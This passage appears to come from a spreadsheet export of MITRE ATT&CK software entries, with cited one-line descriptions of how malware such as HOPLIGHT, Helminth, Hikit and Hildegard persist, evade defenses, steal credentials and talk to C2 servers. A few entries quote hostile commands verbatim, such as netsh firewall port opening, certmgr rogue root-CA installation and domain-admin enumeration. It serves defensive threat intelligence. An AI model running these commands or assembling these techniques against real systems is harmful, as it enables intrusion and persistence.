    <t>[H1N1](https://attack.mitre.org/software/S0132) obfuscates C2 traffic with an altered version of base64.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) kills and disables services for Windows Firewall.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) kills and disables services for Windows Security Center, and Windows Defender.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) disable recovery options and deletes shadow copies from the victim.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) uses multiple techniques to obfuscate strings, including XOR.(Citation: Cisco H1N1 Part 1)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) has functionality to copy itself to removable media.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) uses a custom packing algorithm.(Citation: Cisco H1N1 Part 1)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) encrypts C2 traffic using an RC4 key.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) has functionality to copy itself to network shares.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) kills and disables services by using cmd.exe.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can delete a specified file.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can execute PowerShell scripts.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can obtain information about running processes on the victim.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can obtain screenshots from the victim.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can obtain information about the OS, processor, and BIOS.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can use WMI queries to gather system information.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>[HAMMERTOSS](https://attack.mitre.org/software/S0037) exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>[HAMMERTOSS](https://attack.mitre.org/software/S0037) has used &lt;code&gt;-WindowStyle hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>The "tDiscoverer" variant of [HAMMERTOSS](https://attack.mitre.org/software/S0037) establishes a C2 channel by downloading resources from Web services like Twitter and GitHub. [HAMMERTOSS](https://attack.mitre.org/software/S0037) binaries contain an algorithm that generates a different Twitter handle for the malware to check for instructions every day.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>[HAMMERTOSS](https://attack.mitre.org/software/S0037) is known to use PowerShell.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>[HAMMERTOSS](https://attack.mitre.org/software/S0037) is controlled via commands that are appended to image files.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>Before being appended to image files, [HAMMERTOSS](https://attack.mitre.org/software/S0037) commands are encrypted with a key composed of both a hard-coded value and a string contained on that day's tweet. To decrypt the commands, an investigator would need access to the intended malware sample, the day's tweet, and the image file containing the command.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>The "Uploader" variant of [HAMMERTOSS](https://attack.mitre.org/software/S0037) visits a hard-coded server over HTTP/S to download the images [HAMMERTOSS](https://attack.mitre.org/software/S0037) uses to receive commands.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>can download and execute a second-stage payload.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>can collect system information, including computer name, system manufacturer, IsDebuggerPresent state, and execution path.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>can collect the victim user name.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) opens the Windows Firewall to modify incoming connections.(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) binds and listens on port 443 with a FakeTLS method.(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) uses FakeTLS to communicate with its C2 server.(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) uses the command &lt;code&gt;cmd.exe /c netsh firewall add portopening TCP 443 "adp"&lt;/code&gt; and makes the victim machine function as a proxy server.(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) uses cmd.exe to execute &lt;code&gt;netsh&lt;/code&gt;commands.(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has encrypted data with XOR before sending it over the C2 channel.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has used an OLE object that uses Equation Editor to drop the embedded shellcode.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has sent system information and files over the C2 channel.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[HAWKBALL](https://attack.mitre.org/software/S0391) has exploited Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802 to deliver the payload.(Citation: FireEye HAWKBALL Jun 2019) </t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has the ability to delete files.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has leveraged several Windows API calls to create processes, gather disk information, and detect debugger activity.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has encrypted the payload with an XOR-based algorithm.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) can collect the OS version, architecture information, and computer name.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) can collect the user name of the system.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has used HTTP to communicate with a single hard-coded C2 server.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has created a cmd.exe reverse shell, executed commands, and uploaded output via the command line.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HDoor](https://attack.mitre.org/software/S0061) kills anti-virus found on the victim.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[HDoor](https://attack.mitre.org/software/S0061) scans to identify open ports on the victim.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[HIDEDRV](https://attack.mitre.org/software/S0135) injects a DLL for [Downdelph](https://attack.mitre.org/software/S0134) into the explorer.exe process.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>[HIDEDRV](https://attack.mitre.org/software/S0135) is a rootkit that hides certain operating system artifacts.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>[HOMEFRY](https://attack.mitre.org/software/S0232) can perform credential dumping.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>Some strings in [HOMEFRY](https://attack.mitre.org/software/S0232) are obfuscated with XOR x56.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[HOMEFRY](https://attack.mitre.org/software/S0232) uses a command-line interface.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has modified the firewall using [netsh](https://attack.mitre.org/software/S0108).(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has used its C2 channel to exfiltrate data.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has multiple C2 channels in place in case one fails.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has been observed enumerating system drives and partitions.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has the ability to connect to a remote host in order to upload and download files.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has modified Managed Object Format (MOF) files within the Registry to run specific commands and create persistence on the system.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has connected outbound over TCP port 443 with a FakeTLS method.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has been observed loading several APIs associated with Pass the Hash.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has injected into running processes.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has multiple proxy options that mask traffic between the malware and the remote operators.(Citation: US-CERT HOPLIGHT Apr 2019) 
</t>
  </si>
  <si>
    <t>A variant of [HOPLIGHT](https://attack.mitre.org/software/S0376) hooks lsass.exe, and lsass.exe then checks the Registry for the data value 'rdpproto' under the key &lt;code&gt;SYSTEM\CurrentControlSet\Control\Lsa Name&lt;/code&gt;.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has the capability to harvest credentials and passwords from the SAM database.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has used svchost.exe to execute a malicious DLL .(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has utilized Zlib compression to obfuscate the communications payload. (Citation: US-CERT HOPLIGHT Apr 2019) 
</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has been observed collecting victim machine information like OS version, drivers, volume information and more.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has been observed collecting system time from victim machines.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) can launch cmd.exe to execute commands on the system.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has used WMI to recompile the Managed Object Format (MOF) files in the WMI repository.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HTRAN](https://attack.mitre.org/software/S0040) can inject into into running processes.(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[HTRAN](https://attack.mitre.org/software/S0040) can proxy TCP socket connections to obfuscate command and control infrastructure.(Citation: Operation Quantum Entanglement)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[HTRAN](https://attack.mitre.org/software/S0040) can install a rootkit to hide network connections from the host OS.(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) abuses the Windows DLL load order by using a legitimate Symantec anti-virus binary, VPDN_LU.exe, to load a malicious DLL that mimics a legitimate Symantec DLL, navlu.dll.(Citation: ZScaler Hacking Team)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) has used DLL side-loading.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) has used DNS for command and control.(Citation: Dell TG-3390)(Citation: ThreatStream Evasion Analysis)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) deletes its original installer file once installation is complete.(Citation: ZScaler Hacking Team)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) is capable of listing files, folders, and drives on a victim.(Citation: Dell TG-3390)(Citation: ZScaler Hacking Team)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) is capable of writing a file to the compromised system from the C2 server.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) is capable of capturing keystrokes on victims.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070)'s installer contains a malicious file named navlu.dll to decrypt and run the RAT. navlu.dll is also the name of a legitimate Symantec DLL.(Citation: ZScaler Hacking Team)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070)'s code may be obfuscated through structured exception handling and return-oriented programming.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) has established persistence by setting the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; key value for &lt;code&gt;wdm&lt;/code&gt; to the path of the executable. It has also used the Registry entry &lt;code&gt;HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run vpdn “%ALLUSERPROFILE%\%APPDATA%\vpdn\VPDN_LU.exe”&lt;/code&gt; to establish persistence.(Citation: ZScaler Hacking Team)(Citation: ThreatStream Evasion Analysis)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) has used HTTP and HTTPS for command and control.(Citation: Dell TG-3390)(Citation: ThreatStream Evasion Analysis)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) is capable of spawning a reverse shell on a victim.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[Hacking Team UEFI Rootkit](https://attack.mitre.org/software/S0047) is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.(Citation: TrendMicro Hacking Team UEFI)</t>
  </si>
  <si>
    <t>System Firmware</t>
  </si>
  <si>
    <t xml:space="preserve">[Hacking Team UEFI Rootkit](https://attack.mitre.org/software/S0047) is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.(Citation: TrendMicro Hacking Team UEFI) </t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has decoded Base64 encoded URLs to insert a recipient’s name into the filename of the Word document. [Hancitor](https://attack.mitre.org/software/S0499) has also extracted executables from ZIP files.(Citation: Threatpost Hancitor)(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has deleted files using the VBA &lt;code&gt;kill&lt;/code&gt; function.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has the ability to download additional files from C2.(Citation: Threatpost Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used malicious Microsoft Word documents, sent via email, which prompted the victim to enable macros.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has relied upon users clicking on a malicious link delivered through phishing.(Citation: Threatpost Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used &lt;code&gt;CallWindowProc&lt;/code&gt; and &lt;code&gt;EnumResourceTypesA&lt;/code&gt; to interpret and execute shellcode.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used Base64 to encode malicious links. [Hancitor](https://attack.mitre.org/software/S0499) has also delivered compressed payloads in ZIP files to victims.(Citation: Threatpost Hancitor)(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used PowerShell to execute commands.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499)  has added Registry Run keys to establish persistence.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has been delivered via phishing emails with malicious attachments.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has been delivered via phishing emails which contained malicious links.(Citation: Threatpost Hancitor)</t>
  </si>
  <si>
    <t>Verclsid</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used verclsid.exe to download and execute a malicious script.(Citation: Red Canary Verclsid.exe)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used a macro to check that an ActiveDocument shape object in the lure message is present. If this object is not found, the macro will exit without downloading additional payloads.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Havij](https://attack.mitre.org/software/S0224) is used to automate SQL injection.(Citation: Check Point Havij Analysis)</t>
  </si>
  <si>
    <t>A [Helminth](https://attack.mitre.org/software/S0170) VBScript receives a batch script to execute a set of commands in a command prompt.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>The executable version of [Helminth](https://attack.mitre.org/software/S0170) has a module to log clipboard contents.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) samples have been signed with legitimate, compromised code signing certificates owned by software company AI Squared.(Citation: ClearSky OilRig Jan 2017)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) can use DNS for C2.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) splits data into chunks up to 23 bytes and sends the data in DNS queries to its C2 server.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) has checked for the domain admin group and Exchange Trusted Subsystem groups using the commands &lt;code&gt;net group Exchange Trusted Subsystem /domain&lt;/code&gt; and &lt;code&gt;net group domain admins /domain&lt;/code&gt;.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) can download additional files.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>The executable version of [Helminth](https://attack.mitre.org/software/S0170) has a module to log keystrokes.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) creates folders to store output from batch scripts prior to sending the information to its C2 server.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) has checked the local administrators group.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>The [Helminth](https://attack.mitre.org/software/S0170) config file is encrypted with RC4.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>One version of [Helminth](https://attack.mitre.org/software/S0170) uses a PowerShell script.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) has used [Tasklist](https://attack.mitre.org/software/S0057) to get information on processes.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) establishes persistence by creating a shortcut in the Start Menu folder.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) has used a scheduled task for persistence.(Citation: ClearSky OilRig Jan 2017)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) establishes persistence by creating a shortcut.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>For C2 over HTTP, [Helminth](https://attack.mitre.org/software/S0170) encodes data with base64 and sends it via the "Cookie" field of HTTP requests. For C2 over DNS, [Helminth](https://attack.mitre.org/software/S0170) converts ASCII characters into their hexadecimal values and sends the data in cleartext.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) encrypts data sent to its C2 server over HTTP with RC4.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>One version of [Helminth](https://attack.mitre.org/software/S0170) consists of VBScript scripts.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) can use HTTP for C2.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) can provide a remote shell. One version of [Helminth](https://attack.mitre.org/software/S0170) uses batch scripting.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) encrypts C2 traffic with TLS.(Citation: Fidelis Hi-Zor)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) deletes its RAT installer file as it executes its DLL payload file.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) has the ability to upload and download files from its C2 server.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) uses various XOR techniques to obfuscate its components.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) creates a Registry Run key to establish persistence.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) executes using regsvr32.exe called from the [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001) persistence mechanism.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) encrypts C2 traffic with a double XOR using two distinct single-byte keys.(Citation: Fidelis Hi-Zor)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) communicates with its C2 server over HTTPS.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) has the ability to create a reverse shell.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) uses a cipher to implement a decoding function.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) adds itself as a shared object to the LD_PRELOAD environment variable.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) downloads a tar compressed archive from a download server to the system.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) creates a user account as a means to provide initial persistence to the compromised machine.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) communicates with a simple network protocol over TCP.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) encrypts its configuration and payload.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>RC Scripts</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) installs reboot persistence by adding itself to &lt;code&gt;/etc/rc.local&lt;/code&gt;.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) uses a rootkit to hook and implement functions on the system.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) uses an RC4-like algorithm with an already computed PRGA generated key-stream for network communication.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) uses a script to automate tasks on the victim's machine and to assist in execution.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) has attempted to disable driver signing verification by tampering with several Registry keys prior to the loading of a rootkit driver component.(Citation: FireEye HIKIT Rootkit Part 2)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) has used [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001) to load &lt;code&gt;oci.dll&lt;/code&gt; as a persistence mechanism.(Citation: FireEye Hikit Rootkit)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) uses &lt;code&gt;certmgr.exe -add GlobalSign.cer -c -s -r localMachine Root&lt;/code&gt; and &lt;code&gt;certmgr.exe -add GlobalSign.cer -c -s -r localMachineTrustedPublisher&lt;/code&gt; to install a self-generated certificate to the local trust store as a root CA and Trusted Publisher.(Citation: FireEye HIKIT Rootkit Part 2)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) supports peer connections.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t xml:space="preserve">[Hikit](https://attack.mitre.org/software/S0009) is a [Rootkit](https://attack.mitre.org/techniques/T1014) that has been used by [Axiom](https://attack.mitre.org/groups/G0001).(Citation: FireEye Hikit Rootkit) (Citation: FireEye HIKIT Rootkit Part 2) </t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) performs XOR encryption.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) has used HTTP for C2.(Citation: FireEye HIKIT Rootkit Part 2)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) has the ability to create a remote shell and run given commands.(Citation: FireEye HIKIT Rootkit Part 2)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has used an IRC channel for C2 communications.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>Clear Command History</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has used history -c to clear script shell logs.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>Cloud Instance Metadata API</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has queried the Cloud Instance Metadata API for cloud credentials.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) was executed through the kubelet API run command and by executing commands on running containers.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t xml:space="preserve">[Hildegard](https://attack.mitre.org/software/S0601) has used masscan to search for kubelets and the kubelet API for additional running containers.(Citation: Unit 42 Hildegard Malware) </t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has searched for SSH keys, Docker credentials, and Kubernetes service tokens.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has decrypted ELF files with AES.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has modified DNS resolvers to evade DNS monitoring tools.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has modified /etc/ld.so.preload to intercept shared library import functions.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t xml:space="preserve">[Hildegard](https://attack.mitre.org/software/S0601) has used the BOtB tool that can break out of containers. (Citation: Unit 42 Hildegard Malware) </t>
  </si>
  <si>
    <t xml:space="preserve">[Hildegard](https://attack.mitre.org/software/S0601) has used the BOtB tool which exploits CVE-2019-5736.(Citation: Unit 42 Hildegard Malware) </t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) was executed through an unsecure kubelet that allowed anonymous access to the victim environment.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t xml:space="preserve">[Hildegard](https://attack.mitre.org/software/S0601) has deleted scripts after execution.(Citation: Unit 42 Hildegard Malware) </t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has downloaded additional scripts that build and run Monero cryptocurrency miners.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has created a user named “monerodaemon”.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has disguised itself as a known Linux process.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
